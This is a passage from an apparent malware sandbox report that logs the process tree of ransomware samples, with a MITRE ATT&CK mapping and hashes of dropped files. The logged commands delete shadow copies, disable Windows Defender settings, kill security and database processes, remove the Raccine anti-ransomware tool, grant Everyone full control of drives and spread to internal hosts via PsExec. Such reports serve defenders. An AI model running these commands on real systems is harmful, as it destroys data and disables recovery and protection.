    "net.exe" use \\127.0.0.1\P$
    3⤵
    PID:5724
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    PID:5344
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:3360
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Q$
    3⤵
    PID:4940
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\R$
    3⤵
    PID:4660
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    PID:4572
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:4804
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\S$
    3⤵
    PID:4016
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\T$
    3⤵
    PID:1464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:5004
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    PID:4776
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\U$
    3⤵
    PID:4276
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\V$
    3⤵
    PID:3092
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    PID:800
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:5732
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\W$
    3⤵
    PID:5428
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\X$
    3⤵
    PID:1676
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:5668
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Y$
    3⤵
    PID:5280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:1808
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.127\Z$
    3⤵
    PID:5384
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4680
- - C:\Windows\TEMP\xp2cek0m.exe
    "C:\Windows\TEMP\xp2cek0m.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:4736
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2136
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4324
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.15\Users
    3⤵
    PID:2908
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.18\Users
    3⤵
    PID:1844
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.21\Users
    3⤵
    PID:6032
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.24\Users
    3⤵
    PID:4208
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.39\Users
    3⤵
    PID:4472

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:904

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:1548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:5860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:5540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:5000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:4976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:5164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:5212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:5960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:4892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:4864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:4152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:4776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:3888

C:\Windows\PAExec-3816-RJMQBVDN.exe
C:\Windows\PAExec-3816-RJMQBVDN.exe -service
1⤵
PID:4356
- C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
  2⤵
  PID:4988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:4832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:5396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:4316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:3576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:5604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:5888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:4288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:4140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:4220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:5456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:5716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:5364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:4940
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:6012
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:5492
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:4884
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:4456
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:3412
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:5868
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:5712
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5536
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5612
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:5328
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5700
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4812
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:4184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:4980
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:5836
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:3640
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:4448
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:3700
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6084
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5264
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:4948
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5256
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4740
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:5660
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4172
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:4784
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:5720
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:3408
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:3544
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:5736
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    PID:852
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:5748
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4700
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1208
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:676
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:1540
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:5656
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:5264
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    PID:6108
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:6060
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:4128
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:5288
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:5168
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:800
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:4952
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    PID:5344
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:4432
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:5528
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:5200
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    PID:1228
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    PID:6124
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:5276
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:5676
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    PID:1704
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5256
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    PID:4728
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    PID:3752
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    PID:5656
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    PID:3516
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    PID:5252
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    PID:5328
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    PID:1664
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /f
    3⤵
    - Kills process with taskkill
    PID:2208
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rphost.exe /f
    3⤵
    - Kills process with taskkill
    PID:5412
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysql.exe /f
    3⤵
    - Kills process with taskkill
    PID:4564
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rmngr.exe /f
    3⤵
    PID:4428
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqld.exe /f
    3⤵
    - Kills process with taskkill
    PID:6000
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ragent.exe /f
    3⤵
    PID:5556
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:1672
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /f
    3⤵
    PID:5532
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM 1cv8.exe /f
    3⤵
    PID:4536
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM vmwp.exe /f
    3⤵
    PID:4276
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sql.exe /f
    3⤵
    PID:5332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:4312
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2112
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3152
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5176

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:5848
- C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
  "714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
  2⤵
  PID:5236
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:5688
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:4940
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:4644
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:3780
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4860
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:5096
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:5828
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:1684
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5080
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:1524
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:5344
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:3152
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    PID:4404
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    PID:5464
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:2112
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1896
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:5676
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4336
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:1496
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:1796
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    PID:4740
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:5276
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    PID:676
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:5628
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:5208
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4576
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:800
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5164
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2204
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5708

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
7e0ebf2fe77a23925695521c5ce6cd8d

SHA1
050cd51cd20dddb49c8c30740ce6d62f4999a63e

SHA256
0bdb3190e7b8e713cdb848d5ac6fa8ac12c8c66e666578ad036fe7905e78556d

SHA512
d277af18e211853f300afa14e5682efd1b0e2c219990bafa01a155ea3de17a7f15550625d0df1b326b2a5b49fc1bb2ad0611ad0e82afb5cf825a71f476a3c42b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
9896af3ccbeca392366cc344aa21f691

SHA1
ff8b8a12e72afbe9eea6d35e67076ac623d9d541

SHA256
bce82efc80fab6c20a950547f2510555c1cf8b1cfbd030bb2bb943201cd44b91

SHA512
4229d7e8752246a3f28898fc3defd63061a1d539ec52d07e4339272e01501378c72d7d5366f5e3c0b392acc102c8822481e241862e19f61d49f83fc7d3b381bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
2aeb9f375585a6a83b468988569ca251

SHA1
82d1b94b0164d6c2d719545359211c1285eafb00

SHA256
